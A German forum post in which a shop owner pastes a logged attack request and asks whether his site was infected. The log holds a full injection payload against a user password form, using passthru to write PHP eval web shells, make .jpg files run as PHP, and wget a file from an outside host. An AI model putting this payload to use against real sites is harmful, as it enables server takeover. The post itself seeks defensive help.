Hallo liebes Forum,
ich habe eine email mit folgendem Inhalt erhalten, und mache mir jetzt sorgen dass mein Shop infiziert worden sein könnte.
CRITICAL
Message:
The provided X-CSRF-Token for path "/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27" is invalid. Please go back, reload the page and try again.
Time:
2019-04-07T10:44:02.332608+0200
Channel:
core
request:
{
"uri": "/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27",
"method": "POST",
"query": {
"q": "user/password",
"name": {
"#post_render": [
"passthru"
],
"#type": "markup",
"#markup": "echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'http://40k.waszmann.de/Deutsch/images/up.php'"
}
},
"post": {
"_triggering_element_name": "name",
"form_id": "user_pass"
}
}
session:
No session data available
War das nur der Versuch einer Infektion? Kann mit eventuell jemand weiter helfen?
Viele Grüße
Sebastian